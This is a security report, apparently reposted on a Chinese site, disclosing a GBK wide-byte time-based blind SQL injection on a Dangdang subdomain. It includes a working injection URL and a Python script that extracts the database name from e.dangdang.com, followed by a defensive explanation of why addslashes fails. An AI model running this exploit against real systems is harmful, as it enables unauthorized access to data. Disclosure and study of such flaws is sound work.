A Dangdang subdomain has a time-based blind SQL injection | 安全盒子

July 21, 2018 - 安全盒子

Brief description:

A Dangdang subdomain has a wide-byte (GBK) time-based blind SQL injection.

Details:

http://e.dangdang.com/Standard/Framework/Core/hosts/ajax_api.php?isajax=1&page_id=14456%df’or/**/sleep(5)%23&component_map_id=74288&domain=shuzi.dangdang.com&path_name=index&areaid=0&page_type=3&areatype=0&static_type=0&mix=1&domain_flag=1

The page_id parameter is vulnerable to a wide-byte time-based blind SQL injection.

Test script attached:

```python
# encoding=utf-8
# Time-based blind injection test script from the report, cleaned up to run on
# Python 3. It guesses database() one character at a time: a request that takes
# longer than the 5-second client timeout is read as sleep(5) having fired.
import http.client
import socket

headers = {}

payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'
print('Start to retrieve mysql database():')

user = ''
for i in range(1, 30):
    j = 0
    isbreak = False
    for payload in payloads:
        try:
            s = "ascii(substring(lower(database()),%s,1))=%s" % (i, ord(payload))
            s = "if((" + s + "),sleep(5),1)"
            conn = http.client.HTTPConnection('e.dangdang.com', timeout=5)
            conn.request(method='GET',
                         url="/Standard/Framework/Core/hosts/ajax_api.php?isajax=1&page_id=14456%df'or/**/" + s + "%23&component_map_id=74288&domain=shuzi.dangdang.com&path_name=index&areaid=0&page_type=3&areatype=0&static_type=0&mix=1&domain_flag=1",
                         headers=headers)
            conn.getresponse()
            conn.close()
            print('.', end='', flush=True)
            j = j + 1
            if j == len(payloads):
                # no character matched at this position: end of the name
                isbreak = True
        except socket.timeout:
            # the request timed out, so the condition held for this character
            user += payload
            print('[in progress]', user)
            break
    if isbreak:
        break
print('[Done] mysql database is %s' % user)
```

Proof of vulnerability:


Fix:

Filter the input.
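As an added illustration of what the filtering has to account for (example code written for this page, not from the report or from Dangdang's code): a byte-oriented escape such as PHP's addslashes puts a backslash (0x5C) between the 0xDF byte and the quote, a GBK connection then reads 0xDF 0x5C as one character, and the quote is left unescaped; decoding under the connection charset before escaping rejects the malformed input instead. The function names and the probe bytes are constructed for this example.

```python
"""Why a byte-oriented escape fails against a wide-byte ("%df'") injection on a
GBK connection, and how a charset-aware escape treats the same bytes.
Added example with constructed inputs; not the report's own code."""

ESCAPED_BYTES = frozenset(b"'\"\\\x00")


def addslashes(data: bytes) -> bytes:
    """Byte-by-byte escape, the way PHP addslashes()/magic_quotes sees input."""
    out = bytearray()
    for b in data:
        if b in ESCAPED_BYTES:
            out.append(0x5C)  # prepend a backslash
        out.append(b)
    return bytes(out)


def unescaped_quote_survives(value: bytes, charset: str) -> bool:
    """Escape the raw bytes, then read them back the way the database would.

    Returns True if a single quote not preceded by a backslash remains, i.e. the
    string literal can still be closed by the input despite the escaping."""
    text = addslashes(value).decode(charset, errors="replace")
    return any(ch == "'" and (i == 0 or text[i - 1] != "\\")
               for i, ch in enumerate(text))


def escape_charset_aware(value: bytes, charset: str):
    """Decode under the connection charset first, escape characters, re-encode.

    Returns None when the bytes are not valid in that charset: a lone 0xDF lead
    byte followed by a quote is malformed GBK and is rejected outright."""
    try:
        text = value.decode(charset)  # strict: malformed input raises
    except UnicodeDecodeError:
        return None
    text = text.replace("\\", "\\\\").replace("'", "\\'")
    return text.encode(charset)


if __name__ == "__main__":
    probe = b"\xdf'"  # constructed: the %df' prefix used in the report's URL
    for cs in ("gbk", "utf8"):
        print(cs, "quote survives addslashes:", unescaped_quote_survives(probe, cs))
    print("charset-aware gbk, probe:", escape_charset_aware(probe, "gbk"))
    print("charset-aware gbk, plain quote:", escape_charset_aware(b"'", "gbk"))
```

The same distinction is why setting the connection charset with mysqli_set_charset() and using prepared statements, rather than escaping strings by hand, is the durable fix.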
